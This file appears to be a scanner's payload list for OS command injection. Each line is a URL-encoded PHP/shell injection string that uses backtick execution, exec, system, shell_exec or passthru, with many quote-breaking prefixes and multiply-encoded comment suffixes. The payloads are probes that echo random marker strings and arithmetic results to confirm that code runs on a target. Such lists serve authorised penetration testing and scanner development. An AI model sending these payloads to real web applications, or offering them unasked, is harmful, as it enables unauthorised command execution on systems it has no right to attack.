+os-command-injection,''.print(`echo%20HBLPLA%0aecho%20$((39%2B88))%0aecho%20HBLPLA%0aecho%20HBLPLA`)%3B.%252522HBLPLA' +os-command-injection,''.print(`echo%20JLXMKL\necho%20$((67%2B26))\necho%20JLXMKL\necho%20JLXMKL`)%3B.%25252522JLXMKL' +os-command-injection,''.print(`echo%20RDHTSN`.`echo%20$((90%2B44))`.`echo%20RDHTSN`.`echo%20RDHTSN`)%3B.%27RDHTSN' +os-command-injection,''.print(`echo%20WMQCVY;echo%20$((96%2B95));echo%20WMQCVY;echo%20WMQCVY`)%3B.%2527WMQCVY' +os-command-injection,''.print(`echo%20MFBKHT%0aecho%20$((27%2B47))%0aecho%20MFBKHT%0aecho%20MFBKHT`)%3B.%252527MFBKHT' +os-command-injection,''.print(`echo%20IINFPE\necho%20$((95%2B84))\necho%20IINFPE\necho%20IINFPE`)%3B.%25252527IINFPE' +os-command-injection,''.print(`echo%20HLTCMZ`.`echo%20$((55%2B5))`.`echo%20HLTCMZ`.`echo%20HLTCMZ`)%29%7DHLTCMZ' +os-command-injection,''.print(`echo%20TSTIED;echo%20$((94%2B6));echo%20TSTIED;echo%20TSTIED`)%3B%2529%257DTSTIED' +os-command-injection,''.print(`echo%20PFJGQM%0aecho%20$((86%2B33))%0aecho%20PFJGQM%0aecho%20PFJGQM`)%3B%252529%25257DPFJGQM' +os-command-injection,''.print(`echo%20KFTIEO\necho%20$((9%2B66))\necho%20KFTIEO\necho%20KFTIEO`)%3B%25252529%2525257DKFTIEO' +os-command-injection,');}print(`echo%20WZOXHV`.`echo%20$((36%2B81))`.`echo%20WZOXHV`.`echo%20WZOXHV`)%3BWZOXHV' +os-command-injection,');}print(`echo%20UTBTBN;echo%20$((92%2B40));echo%20UTBTBN;echo%20UTBTBN`)%3BUTBTBN' +os-command-injection,');}print(`echo%20KAJDYV%0aecho%20$((71%2B88))%0aecho%20KAJDYV%0aecho%20KAJDYV`)%3BKAJDYV' +os-command-injection,');}print(`echo%20PJRPBN\necho%20$((21%2B16))\necho%20PJRPBN\necho%20PJRPBN`)%3BPJRPBN' +os-command-injection,');}print(`echo%20KRAWWO`.`echo%20$((15%2B36))`.`echo%20KRAWWO`.`echo%20KRAWWO`)%3B%5C%5CKRAWWO' +os-command-injection,');}print(`echo%20JRCPDX;echo%20$((59%2B49));echo%20JRCPDX;echo%20JRCPDX`)%3B%255C%255CJRCPDX' +os-command-injection,');}print(`echo%20XMVWXQ%0aecho%20$((48%2B88))%0aecho%20XMVWXQ%0aecho%20XMVWXQ`)%3B%25255C%25255CXMVWXQ' +os-command-injection,');}print(`echo%20SWQEIO\necho%20$((64%2B42))\necho%20SWQEIO\necho%20SWQEIO`)%3B%2525255C%2525255CSWQEIO' +os-command-injection,');}print(`echo%20MUNABZ`.`echo%20$((46%2B73))`.`echo%20MUNABZ`.`echo%20MUNABZ`)%3B//MUNABZ' +os-command-injection,');}print(`echo%20BAPQUZ;echo%20$((9%2B46));echo%20BAPQUZ;echo%20BAPQUZ`)%3B//BAPQUZ' +os-command-injection,');}print(`echo%20WVNNUB%0aecho%20$((6%2B67))%0aecho%20WVNNUB%0aecho%20WVNNUB`)%3B//WVNNUB' +os-command-injection,');}print(`echo%20KDYDKK\necho%20$((47%2B87))\necho%20KDYDKK\necho%20KDYDKK`)%3B//KDYDKK' +os-command-injection,');}print(`echo%20MRPUDM`.`echo%20$((50%2B14))`.`echo%20MRPUDM`.`echo%20MRPUDM`)%3B%23MRPUDM' +os-command-injection,');}print(`echo%20BJFECX;echo%20$((21%2B86));echo%20BJFECX;echo%20BJFECX`)%3B%2523BJFECX' +os-command-injection,');}print(`echo%20JRFJOE%0aecho%20$((92%2B73))%0aecho%20JRFJOE%0aecho%20JRFJOE`)%3B%252523JRFJOE' +os-command-injection,');}print(`echo%20ZXKKBW\necho%20$((18%2B93))\necho%20ZXKKBW\necho%20ZXKKBW`)%3B%25252523ZXKKBW' +os-command-injection,');}print(`echo%20DETLEF`.`echo%20$((0%2B62))`.`echo%20DETLEF`.`echo%20DETLEF`)%3B.%22DETLEF' +os-command-injection,');}print(`echo%20MSEKQO;echo%20$((87%2B12));echo%20MSEKQO;echo%20MSEKQO`)%3B.%2522MSEKQO' +os-command-injection,');}print(`echo%20HXJYZZ%0aecho%20$((70%2B79))%0aecho%20HXJYZZ%0aecho%20HXJYZZ`)%3B.%252522HXJYZZ' +os-command-injection,');}print(`echo%20DSHIRJ\necho%20$((54%2B41))\necho%20DSHIRJ\necho%20DSHIRJ`)%3B.%25252522DSHIRJ' +os-command-injection,');}print(`echo%20KXLAQH`.`echo%20$((80%2B88))`.`echo%20KXLAQH`.`echo%20KXLAQH`)%3B.%27KXLAQH' +os-command-injection,');}print(`echo%20BCMROJ;echo%20$((2%2B69));echo%20BCMROJ;echo%20BCMROJ`)%3B.%2527BCMROJ' +os-command-injection,');}print(`echo%20OSKSTF%0aecho%20$((2%2B12))%0aecho%20OSKSTF%0aecho%20OSKSTF`)%3B.%252527OSKSTF' +os-command-injection,');}print(`echo%20KBRMCR\necho%20$((41%2B94))\necho%20KBRMCR\necho%20KBRMCR`)%3B.%25252527KBRMCR' +os-command-injection,');}print(`echo%20KYGLOF`.`echo%20$((80%2B87))`.`echo%20KYGLOF`.`echo%20KYGLOF`)%29%7DKYGLOF' +os-command-injection,');}print(`echo%20JIIHYT;echo%20$((7%2B65));echo%20JIIHYT;echo%20JIIHYT`)%3B%2529%257DJIIHYT' +os-command-injection,');}print(`echo%20SCGPHN%0aecho%20$((41%2B99))%0aecho%20SCGPHN%0aecho%20SCGPHN`)%3B%252529%25257DSCGPHN' +os-command-injection,');}print(`echo%20KAYVRD\necho%20$((4%2B54))\necho%20KAYVRD\necho%20KAYVRD`)%3B%25252529%2525257DKAYVRD' +os-command-injection,'');}print(`echo%20YERJDV`.`echo%20$((3%2B37))`.`echo%20YERJDV`.`echo%20YERJDV`)%3BYERJDV' +os-command-injection,'');}print(`echo%20RNSTSU;echo%20$((52%2B2));echo%20RNSTSU;echo%20RNSTSU`)%3BRNSTSU' +os-command-injection,'');}print(`echo%20EKPEWV%0aecho%20$((50%2B69))%0aecho%20EKPEWV%0aecho%20EKPEWV`)%3BEKPEWV' +os-command-injection,'');}print(`echo%20BHUVJI\necho%20$((10%2B13))\necho%20BHUVJI\necho%20BHUVJI`)%3BBHUVJI' +os-command-injection,'');}print(`echo%20TBZBGJ`.`echo%20$((58%2B75))`.`echo%20TBZBGJ`.`echo%20TBZBGJ`)%3B%5C%5CTBZBGJ' +os-command-injection,'');}print(`echo%20NPFNRM;echo%20$((91%2B52));echo%20NPFNRM;echo%20NPFNRM`)%3B%255C%255CNPFNRM' +os-command-injection,'');}print(`echo%20HDWSHN%0aecho%20$((40%2B78))%0aecho%20HDWSHN%0aecho%20HDWSHN`)%3B%25255C%25255CHDWSHN' +os-command-injection,'');}print(`echo%20FOGQPM\necho%20$((27%2B12))\necho%20FOGQPM\necho%20FOGQPM`)%3B%2525255C%2525255CFOGQPM' +os-command-injection,'');}print(`echo%20XREPUI`.`echo%20$((55%2B99))`.`echo%20XREPUI`.`echo%20XREPUI`)%3B//XREPUI' +os-command-injection,'');}print(`echo%20GVZZMK;echo%20$((1%2B62));echo%20GVZZMK;echo%20GVZZMK`)%3B//GVZZMK' +os-command-injection,'');}print(`echo%20VBLUSZ%0aecho%20$((96%2B95))%0aecho%20VBLUSZ%0aecho%20VBLUSZ`)%3B//VBLUSZ' +os-command-injection,'');}print(`echo%20EVHTLK\necho%20$((99%2B40))\necho%20EVHTLK\necho%20EVHTLK`)%3B//EVHTLK' +os-command-injection,'');}print(`echo%20URYEKO`.`echo%20$((45%2B57))`.`echo%20URYEKO`.`echo%20URYEKO`)%3B%23URYEKO' +os-command-injection,'');}print(`echo%20BQJSKG;echo%20$((72%2B76));echo%20BQJSKG;echo%20BQJSKG`)%3B%2523BQJSKG' +os-command-injection,'');}print(`echo%20IMZVGR%0aecho%20$((80%2B38))%0aecho%20IMZVGR%0aecho%20IMZVGR`)%3B%252523IMZVGR' +os-command-injection,'');}print(`echo%20MMQDEE\necho%20$((77%2B28))\necho%20MMQDEE\necho%20MMQDEE`)%3B%25252523MMQDEE' +os-command-injection,'');}print(`echo%20HDQYRP`.`echo%20$((43%2B86))`.`echo%20HDQYRP`.`echo%20HDQYRP`)%3B.%22HDQYRP' +os-command-injection,'');}print(`echo%20JDHUOY;echo%20$((0%2B32));echo%20JDHUOY;echo%20JDHUOY`)%3B.%2522JDHUOY' +os-command-injection,'');}print(`echo%20GKLRKU%0aecho%20$((97%2B77))%0aecho%20GKLRKU%0aecho%20GKLRKU`)%3B.%252522GKLRKU' +os-command-injection,'');}print(`echo%20UXXDJD\necho%20$((17%2B17))\necho%20UXXDJD\necho%20UXXDJD`)%3B.%25252522UXXDJD' +os-command-injection,'');}print(`echo%20HEGGJN`.`echo%20$((68%2B69))`.`echo%20HEGGJN`.`echo%20HEGGJN`)%3B.%27HEGGJN' +os-command-injection,'');}print(`echo%20YXZEEF;echo%20$((79%2B80));echo%20YXZEEF;echo%20YXZEEF`)%3B.%2527YXZEEF' +os-command-injection,'');}print(`echo%20TJELNR%0aecho%20$((81%2B0))%0aecho%20TJELNR%0aecho%20TJELNR`)%3B.%252527TJELNR' +os-command-injection,'');}print(`echo%20IFVTUZ\necho%20$((51%2B31))\necho%20IFVTUZ\necho%20IFVTUZ`)%3B.%25252527IFVTUZ' +os-command-injection,'');}print(`echo%20SVXVYZ`.`echo%20$((35%2B1))`.`echo%20SVXVYZ`.`echo%20SVXVYZ`)%29%7DSVXVYZ' +os-command-injection,'');}print(`echo%20TFOYWK;echo%20$((13%2B51));echo%20TFOYWK;echo%20TFOYWK`)%3B%2529%257DTFOYWK' +os-command-injection,'');}print(`echo%20IXTNVY%0aecho%20$((8%2B16))%0aecho%20IXTNVY%0aecho%20IXTNVY`)%3B%252529%25257DIXTNVY' +os-command-injection,'');}print(`echo%20DEXNOX\necho%20$((69%2B36))\necho%20DEXNOX\necho%20DEXNOX`)%3B%25252529%2525257DDEXNOX' +os-command-injection,'");}print(`echo%20NAAXBX`.`echo%20$((38%2B13))`.`echo%20NAAXBX`.`echo%20NAAXBX`)%3BNAAXBX' +os-command-injection,'");}print(`echo%20TWEYRU;echo%20$((57%2B60));echo%20TWEYRU;echo%20TWEYRU`)%3BTWEYRU' +os-command-injection,'");}print(`echo%20WCABAY%0aecho%20$((46%2B3))%0aecho%20WCABAY%0aecho%20WCABAY`)%3BWCABAY' +os-command-injection,'");}print(`echo%20XYXNLP\necho%20$((64%2B13))\necho%20XYXNLP\necho%20XYXNLP`)%3BXYXNLP' +os-command-injection,'");}print(`echo%20QHWLWM`.`echo%20$((41%2B28))`.`echo%20QHWLWM`.`echo%20QHWLWM`)%3B%5C%5CQHWLWM' +os-command-injection,'");}print(`echo%20WQBRFD;echo%20$((85%2B53));echo%20WQBRFD;echo%20WQBRFD`)%3B%255C%255CWQBRFD' +os-command-injection,'");}print(`echo%20HWAGVJ%0aecho%20$((14%2B22))%0aecho%20HWAGVJ%0aecho%20HWAGVJ`)%3B%25255C%25255CHWAGVJ' +os-command-injection,'");}print(`echo%20XILSBL\necho%20$((74%2B71))\necho%20XILSBL\necho%20XILSBL`)%3B%2525255C%2525255CXILSBL' +os-command-injection,'");}print(`echo%20KHRTRY`.`echo%20$((68%2B68))`.`echo%20KHRTRY`.`echo%20KHRTRY`)%3B//KHRTRY' +os-command-injection,'");}print(`echo%20YDWEZS;echo%20$((87%2B70));echo%20YDWEZS;echo%20YDWEZS`)%3B//YDWEZS' +os-command-injection,'");}print(`echo%20JFBZLZ%0aecho%20$((64%2B83))%0aecho%20JFBZLZ%0aecho%20JFBZLZ`)%3B//JFBZLZ' +os-command-injection,'");}print(`echo%20UTFROF\necho%20$((67%2B6))\necho%20UTFROF\necho%20UTFROF`)%3B//UTFROF' +os-command-injection,'");}print(`echo%20RACXOI`.`echo%20$((81%2B11))`.`echo%20RACXOI`.`echo%20RACXOI`)%3B%23RACXOI' +os-command-injection,'");}print(`echo%20DKLYZK;echo%20$((5%2B95));echo%20DKLYZK;echo%20DKLYZK`)%3B%2523DKLYZK' +os-command-injection,'");}print(`echo%20YSGCAB%0aecho%20$((76%2B3))%0aecho%20YSGCAB%0aecho%20YSGCAB`)%3B%252523YSGCAB' +os-command-injection,'");}print(`echo%20CKSIUK\necho%20$((45%2B4))\necho%20CKSIUK\necho%20CKSIUK`)%3B%25252523CKSIUK' +os-command-injection,'");}print(`echo%20LVFGXD`.`echo%20$((25%2B23))`.`echo%20LVFGXD`.`echo%20LVFGXD`)%3B.%22LVFGXD' +os-command-injection,'");}print(`echo%20IBFQKH;echo%20$((32%2B31));echo%20IBFQKH;echo%20IBFQKH`)%3B.%2522IBFQKH' +os-command-injection,'");}print(`echo%20MPXDZZ%0aecho%20$((78%2B91))%0aecho%20MPXDZZ%0aecho%20MPXDZZ`)%3B.%252522MPXDZZ' +os-command-injection,'");}print(`echo%20GHISCR\necho%20$((96%2B53))\necho%20GHISCR\necho%20GHISCR`)%3B.%25252522GHISCR' +os-command-injection,'");}print(`echo%20UHQKLI`.`echo%20$((50%2B4))`.`echo%20UHQKLI`.`echo%20UHQKLI`)%3B.%27UHQKLI' +os-command-injection,'");}print(`echo%20MDITEG;echo%20$((51%2B68));echo%20MDITEG;echo%20MDITEG`)%3B.%2527MDITEG' +os-command-injection,'");}print(`echo%20RKXNWH%0aecho%20$((63%2B75))%0aecho%20RKXNWH%0aecho%20RKXNWH`)%3B.%252527RKXNWH' +os-command-injection,'");}print(`echo%20RXUKTF\necho%20$((42%2B2))\necho%20RXUKTF\necho%20RXUKTF`)%3B.%25252527RXUKTF' +os-command-injection,'");}print(`echo%20TCCEGQ`.`echo%20$((87%2B34))`.`echo%20TCCEGQ`.`echo%20TCCEGQ`)%29%7DTCCEGQ' +os-command-injection,'");}print(`echo%20NUVVKA;echo%20$((27%2B5));echo%20NUVVKA;echo%20NUVVKA`)%3B%2529%257DNUVVKA' +os-command-injection,'");}print(`echo%20QNFOEE%0aecho%20$((91%2B41))%0aecho%20QNFOEE%0aecho%20QNFOEE`)%3B%252529%25257DQNFOEE' +os-command-injection,'");}print(`echo%20SFBDLE\necho%20$((73%2B49))\necho%20SFBDLE\necho%20SFBDLE`)%3B%25252529%2525257DSFBDLE' +os-command-injection,'${exec(print(`echo%20HIUMZJ`.`echo%20$((69%2B37))`.`echo%20HIUMZJ`.`echo%20HIUMZJ`)%3BHIUMZJ' +os-command-injection,'${exec(print(`echo%20BDBPSZ;echo%20$((87%2B50));echo%20BDBPSZ;echo%20BDBPSZ`)%3BBDBPSZ' +os-command-injection,'${exec(print(`echo%20UVBBNB%0aecho%20$((5%2B32))%0aecho%20UVBBNB%0aecho%20UVBBNB`)%3BUVBBNB' +os-command-injection,'${exec(print(`echo%20ITAGSP\necho%20$((63%2B35))\necho%20ITAGSP\necho%20ITAGSP`)%3BITAGSP' +os-command-injection,'${exec(print(`echo%20JFZDGZ`.`echo%20$((16%2B38))`.`echo%20JFZDGZ`.`echo%20JFZDGZ`)%3B%5C%5CJFZDGZ' +os-command-injection,'${exec(print(`echo%20YYMYQB;echo%20$((54%2B65));echo%20YYMYQB;echo%20YYMYQB`)%3B%255C%255CYYMYQB' +os-command-injection,'${exec(print(`echo%20QTLCRD%0aecho%20$((90%2B5))%0aecho%20QTLCRD%0aecho%20QTLCRD`)%3B%25255C%25255CQTLCRD' +os-command-injection,'${exec(print(`echo%20QRLVMM\necho%20$((41%2B19))\necho%20QRLVMM\necho%20QRLVMM`)%3B%2525255C%2525255CQRLVMM' +os-command-injection,'${exec(print(`echo%20XRESBN`.`echo%20$((9%2B10))`.`echo%20XRESBN`.`echo%20XRESBN`)%3B//XRESBN' +os-command-injection,'${exec(print(`echo%20YFVAOJ;echo%20$((71%2B65));echo%20YFVAOJ;echo%20YFVAOJ`)%3B//YFVAOJ' +os-command-injection,'${exec(print(`echo%20CPYIZR%0aecho%20$((58%2B63))%0aecho%20CPYIZR%0aecho%20CPYIZR`)%3B//CPYIZR' +os-command-injection,'${exec(print(`echo%20UFJNMU\necho%20$((69%2B30))\necho%20UFJNMU\necho%20UFJNMU`)%3B//UFJNMU' +os-command-injection,'${exec(print(`echo%20GKZRWD`.`echo%20$((93%2B76))`.`echo%20GKZRWD`.`echo%20GKZRWD`)%3B%23GKZRWD' +os-command-injection,'${exec(print(`echo%20ASBMQM;echo%20$((65%2B46));echo%20ASBMQM;echo%20ASBMQM`)%3B%2523ASBMQM' +os-command-injection,'${exec(print(`echo%20UZNHTA%0aecho%20$((79%2B41))%0aecho%20UZNHTA%0aecho%20UZNHTA`)%3B%252523UZNHTA' +os-command-injection,'${exec(print(`echo%20TWZNTZ\necho%20$((85%2B67))\necho%20TWZNTZ\necho%20TWZNTZ`)%3B%25252523TWZNTZ' +os-command-injection,'${exec(print(`echo%20BGHSSE`.`echo%20$((10%2B79))`.`echo%20BGHSSE`.`echo%20BGHSSE`)%3B.%22BGHSSE' +os-command-injection,'${exec(print(`echo%20GYABGY;echo%20$((9%2B52));echo%20GYABGY;echo%20GYABGY`)%3B.%2522GYABGY' +os-command-injection,'${exec(print(`echo%20HFMDNB%0aecho%20$((56%2B41))%0aecho%20HFMDNB%0aecho%20HFMDNB`)%3B.%252522HFMDNB' +os-command-injection,'${exec(print(`echo%20KTGGNJ\necho%20$((80%2B87))\necho%20KTGGNJ\necho%20KTGGNJ`)%3B.%25252522KTGGNJ' +os-command-injection,'${exec(print(`echo%20UGDXMC`.`echo%20$((12%2B69))`.`echo%20UGDXMC`.`echo%20UGDXMC`)%3B.%27UGDXMC' +os-command-injection,'${exec(print(`echo%20CHWXXR;echo%20$((19%2B13));echo%20CHWXXR;echo%20CHWXXR`)%3B.%2527CHWXXR' +os-command-injection,'${exec(print(`echo%20OHFTIA%0aecho%20$((97%2B31))%0aecho%20OHFTIA%0aecho%20OHFTIA`)%3B.%252527OHFTIA' +os-command-injection,'${exec(print(`echo%20JPKQMC\necho%20$((63%2B12))\necho%20JPKQMC\necho%20JPKQMC`)%3B.%25252527JPKQMC' +os-command-injection,'${exec(print(`echo%20SRPMSX`.`echo%20$((59%2B33))`.`echo%20SRPMSX`.`echo%20SRPMSX`)%29%7DSRPMSX' +os-command-injection,'${exec(print(`echo%20IHGVIP;echo%20$((98%2B57));echo%20IHGVIP;echo%20IHGVIP`)%3B%2529%257DIHGVIP' +os-command-injection,'${exec(print(`echo%20LWNHYJ%0aecho%20$((0%2B21))%0aecho%20LWNHYJ%0aecho%20LWNHYJ`)%3B%252529%25257DLWNHYJ' +os-command-injection,'${exec(print(`echo%20AOJPQW\necho%20$((18%2B92))\necho%20AOJPQW\necho%20AOJPQW`)%3B%25252529%2525257DAOJPQW' +os-command-injection,'${system(print(`echo%20QIHVTW`.`echo%20$((76%2B48))`.`echo%20QIHVTW`.`echo%20QIHVTW`)%3BQIHVTW' +os-command-injection,'${system(print(`echo%20YVOAMZ;echo%20$((9%2B69));echo%20YVOAMZ;echo%20YVOAMZ`)%3BYVOAMZ' +os-command-injection,'${system(print(`echo%20EDIEDW%0aecho%20$((27%2B90))%0aecho%20EDIEDW%0aecho%20EDIEDW`)%3BEDIEDW' +os-command-injection,'${system(print(`echo%20CTDUTJ\necho%20$((30%2B48))\necho%20CTDUTJ\necho%20CTDUTJ`)%3BCTDUTJ' +os-command-injection,'${system(print(`echo%20CPHTNC`.`echo%20$((73%2B50))`.`echo%20CPHTNC`.`echo%20CPHTNC`)%3B%5C%5CCPHTNC' +os-command-injection,'${system(print(`echo%20GVUXPA;echo%20$((23%2B14));echo%20GVUXPA;echo%20GVUXPA`)%3B%255C%255CGVUXPA' +os-command-injection,'${system(print(`echo%20YHCDBT%0aecho%20$((19%2B19))%0aecho%20YHCDBT%0aecho%20YHCDBT`)%3B%25255C%25255CYHCDBT' +os-command-injection,'${system(print(`echo%20LHBYTT\necho%20$((48%2B0))\necho%20LHBYTT\necho%20LHBYTT`)%3B%2525255C%2525255CLHBYTT' +os-command-injection,'${system(print(`echo%20JJXLFR`.`echo%20$((84%2B45))`.`echo%20JJXLFR`.`echo%20JJXLFR`)%3B//JJXLFR' +os-command-injection,'${system(print(`echo%20QXZKBZ;echo%20$((59%2B25));echo%20QXZKBZ;echo%20QXZKBZ`)%3B//QXZKBZ' +os-command-injection,'${system(print(`echo%20MAFXYF%0aecho%20$((23%2B63))%0aecho%20MAFXYF%0aecho%20MAFXYF`)%3B//MAFXYF' +os-command-injection,'${system(print(`echo%20LXHYXF\necho%20$((50%2B90))\necho%20LXHYXF\necho%20LXHYXF`)%3B//LXHYXF' +os-command-injection,'${system(print(`echo%20XPECBV`.`echo%20$((14%2B77))`.`echo%20XPECBV`.`echo%20XPECBV`)%3B%23XPECBV' +os-command-injection,'${system(print(`echo%20LWTWCT;echo%20$((98%2B35));echo%20LWTWCT;echo%20LWTWCT`)%3B%2523LWTWCT' +os-command-injection,'${system(print(`echo%20RSGSZK%0aecho%20$((0%2B7))%0aecho%20RSGSZK%0aecho%20RSGSZK`)%3B%252523RSGSZK' +os-command-injection,'${system(print(`echo%20MQQJPG\necho%20$((72%2B19))\necho%20MQQJPG\necho%20MQQJPG`)%3B%25252523MQQJPG' +os-command-injection,'${system(print(`echo%20WJAMJI`.`echo%20$((95%2B52))`.`echo%20WJAMJI`.`echo%20WJAMJI`)%3B.%22WJAMJI' +os-command-injection,'${system(print(`echo%20ARCVVC;echo%20$((7%2B90));echo%20ARCVVC;echo%20ARCVVC`)%3B.%2522ARCVVC' +os-command-injection,'${system(print(`echo%20CKLWBH%0aecho%20$((38%2B7))%0aecho%20CKLWBH%0aecho%20CKLWBH`)%3B.%252522CKLWBH' +os-command-injection,'${system(print(`echo%20CZASPT\necho%20$((18%2B64))\necho%20CZASPT\necho%20CZASPT`)%3B.%25252522CZASPT' +os-command-injection,'${system(print(`echo%20TDEKPW`.`echo%20$((36%2B67))`.`echo%20TDEKPW`.`echo%20TDEKPW`)%3B.%27TDEKPW' +os-command-injection,'${system(print(`echo%20FTPLBI;echo%20$((56%2B37));echo%20FTPLBI;echo%20FTPLBI`)%3B.%2527FTPLBI' +os-command-injection,'${system(print(`echo%20RKLPMM%0aecho%20$((66%2B91))%0aecho%20RKLPMM%0aecho%20RKLPMM`)%3B.%252527RKLPMM' +os-command-injection,'${system(print(`echo%20IWAAGD\necho%20$((70%2B17))\necho%20IWAAGD\necho%20IWAAGD`)%3B.%25252527IWAAGD' +os-command-injection,'${system(print(`echo%20ZYLUET`.`echo%20$((5%2B56))`.`echo%20ZYLUET`.`echo%20ZYLUET`)%29%7DZYLUET' +os-command-injection,'${system(print(`echo%20EZFNSE;echo%20$((38%2B74));echo%20EZFNSE;echo%20EZFNSE`)%3B%2529%257DEZFNSE' +os-command-injection,'${system(print(`echo%20DDVDPM%0aecho%20$((1%2B17))%0aecho%20DDVDPM%0aecho%20DDVDPM`)%3B%252529%25257DDDVDPM' +os-command-injection,'${system(print(`echo%20YYSFAL\necho%20$((70%2B5))\necho%20YYSFAL\necho%20YYSFAL`)%3B%25252529%2525257DYYSFAL' +os-command-injection,'${shell_exec(print(`echo%20FDGAHQ`.`echo%20$((87%2B87))`.`echo%20FDGAHQ`.`echo%20FDGAHQ`)%3BFDGAHQ' +os-command-injection,'${shell_exec(print(`echo%20OAPDKW;echo%20$((19%2B47));echo%20OAPDKW;echo%20OAPDKW`)%3BOAPDKW' +os-command-injection,'${shell_exec(print(`echo%20NTILFZ%0aecho%20$((24%2B1))%0aecho%20NTILFZ%0aecho%20NTILFZ`)%3BNTILFZ' +os-command-injection,'${shell_exec(print(`echo%20LTJDND\necho%20$((85%2B41))\necho%20LTJDND\necho%20LTJDND`)%3BLTJDND' +os-command-injection,'${shell_exec(print(`echo%20NSLPBW`.`echo%20$((95%2B54))`.`echo%20NSLPBW`.`echo%20NSLPBW`)%3B%5C%5CNSLPBW' +os-command-injection,'${shell_exec(print(`echo%20MVSQEI;echo%20$((38%2B17));echo%20MVSQEI;echo%20MVSQEI`)%3B%255C%255CMVSQEI' +os-command-injection,'${shell_exec(print(`echo%20VZXASO%0aecho%20$((97%2B88))%0aecho%20VZXASO%0aecho%20VZXASO`)%3B%25255C%25255CVZXASO' +os-command-injection,'${shell_exec(print(`echo%20KRLQHL\necho%20$((37%2B53))\necho%20KRLQHL\necho%20KRLQHL`)%3B%2525255C%2525255CKRLQHL' +os-command-injection,'${shell_exec(print(`echo%20CTGKDZ`.`echo%20$((66%2B54))`.`echo%20CTGKDZ`.`echo%20CTGKDZ`)%3B//CTGKDZ' +os-command-injection,'${shell_exec(print(`echo%20EDDLOS;echo%20$((48%2B73));echo%20EDDLOS;echo%20EDDLOS`)%3B//EDDLOS' +os-command-injection,'${shell_exec(print(`echo%20HULCYO%0aecho%20$((33%2B24))%0aecho%20HULCYO%0aecho%20HULCYO`)%3B//HULCYO' +os-command-injection,'${shell_exec(print(`echo%20CVXUUB\necho%20$((15%2B41))\necho%20CVXUUB\necho%20CVXUUB`)%3B//CVXUUB' +os-command-injection,'${shell_exec(print(`echo%20SICOKB`.`echo%20$((59%2B30))`.`echo%20SICOKB`.`echo%20SICOKB`)%3B%23SICOKB' +os-command-injection,'${shell_exec(print(`echo%20EINNUI;echo%20$((9%2B15));echo%20EINNUI;echo%20EINNUI`)%3B%2523EINNUI' +os-command-injection,'${shell_exec(print(`echo%20FBJSWR%0aecho%20$((91%2B71))%0aecho%20FBJSWR%0aecho%20FBJSWR`)%3B%252523FBJSWR' +os-command-injection,'${shell_exec(print(`echo%20QQZSXU\necho%20$((69%2B44))\necho%20QQZSXU\necho%20QQZSXU`)%3B%25252523QQZSXU' +os-command-injection,'${shell_exec(print(`echo%20ZEVNBY`.`echo%20$((97%2B49))`.`echo%20ZEVNBY`.`echo%20ZEVNBY`)%3B.%22ZEVNBY' +os-command-injection,'${shell_exec(print(`echo%20WBZBZE;echo%20$((19%2B87));echo%20WBZBZE;echo%20WBZBZE`)%3B.%2522WBZBZE' +os-command-injection,'${shell_exec(print(`echo%20KIACLJ%0aecho%20$((8%2B79))%0aecho%20KIACLJ%0aecho%20KIACLJ`)%3B.%252522KIACLJ' +os-command-injection,'${shell_exec(print(`echo%20NHQIAE\necho%20$((63%2B50))\necho%20NHQIAE\necho%20NHQIAE`)%3B.%25252522NHQIAE' +os-command-injection,'${shell_exec(print(`echo%20CKFBET`.`echo%20$((33%2B76))`.`echo%20CKFBET`.`echo%20CKFBET`)%3B.%27CKFBET' +os-command-injection,'${shell_exec(print(`echo%20BMQBVJ;echo%20$((82%2B52));echo%20BMQBVJ;echo%20BMQBVJ`)%3B.%2527BMQBVJ' +os-command-injection,'${shell_exec(print(`echo%20VEKGIY%0aecho%20$((15%2B47))%0aecho%20VEKGIY%0aecho%20VEKGIY`)%3B.%252527VEKGIY' +os-command-injection,'${shell_exec(print(`echo%20VBRHZS\necho%20$((17%2B48))\necho%20VBRHZS\necho%20VBRHZS`)%3B.%25252527VBRHZS' +os-command-injection,'${shell_exec(print(`echo%20PWWUEN`.`echo%20$((49%2B57))`.`echo%20PWWUEN`.`echo%20PWWUEN`)%29%7DPWWUEN' +os-command-injection,'${shell_exec(print(`echo%20OYNPCP;echo%20$((84%2B51));echo%20OYNPCP;echo%20OYNPCP`)%3B%2529%257DOYNPCP' +os-command-injection,'${shell_exec(print(`echo%20DPVESG%0aecho%20$((76%2B66))%0aecho%20DPVESG%0aecho%20DPVESG`)%3B%252529%25257DDPVESG' +os-command-injection,'${shell_exec(print(`echo%20RJFPQU\necho%20$((15%2B60))\necho%20RJFPQU\necho%20RJFPQU`)%3B%25252529%2525257DRJFPQU' +os-command-injection,'${passthru(print(`echo%20NLYULT`.`echo%20$((55%2B80))`.`echo%20NLYULT`.`echo%20NLYULT`)%3BNLYULT' +os-command-injection,'${passthru(print(`echo%20CLQQRV;echo%20$((21%2B24));echo%20CLQQRV;echo%20CLQQRV`)%3BCLQQRV' +os-command-injection,'${passthru(print(`echo%20TYDNLL%0aecho%20$((23%2B29))%0aecho%20TYDNLL%0aecho%20TYDNLL`)%3BTYDNLL' +os-command-injection,'${passthru(print(`echo%20ZKPFXS\necho%20$((3%2B17))\necho%20ZKPFXS\necho%20ZKPFXS`)%3BZKPFXS' +os-command-injection,'${passthru(print(`echo%20CGIUOF`.`echo%20$((1%2B49))`.`echo%20CGIUOF`.`echo%20CGIUOF`)%3B%5C%5CCGIUOF' +os-command-injection,'${passthru(print(`echo%20JRXXWA;echo%20$((92%2B68));echo%20JRXXWA;echo%20JRXXWA`)%3B%255C%255CJRXXWA' +os-command-injection,'${passthru(print(`echo%20KXVPHA%0aecho%20$((20%2B43))%0aecho%20KXVPHA%0aecho%20KXVPHA`)%3B%25255C%25255CKXVPHA' +os-command-injection,'${passthru(print(`echo%20OLJESC\necho%20$((53%2B40))\necho%20OLJESC\necho%20OLJESC`)%3B%2525255C%2525255COLJESC' +os-command-injection,'${passthru(print(`echo%20XGEVDG`.`echo%20$((58%2B30))`.`echo%20XGEVDG`.`echo%20XGEVDG`)%3B//XGEVDG' +os-command-injection,'${passthru(print(`echo%20DBDIBN;echo%20$((7%2B5));echo%20DBDIBN;echo%20DBDIBN`)%3B//DBDIBN' +os-command-injection,'${passthru(print(`echo%20NSBWMT%0aecho%20$((16%2B44))%0aecho%20NSBWMT%0aecho%20NSBWMT`)%3B//NSBWMT' +os-command-injection,'${passthru(print(`echo%20EWDATZ\necho%20$((58%2B44))\necho%20EWDATZ\necho%20EWDATZ`)%3B//EWDATZ' 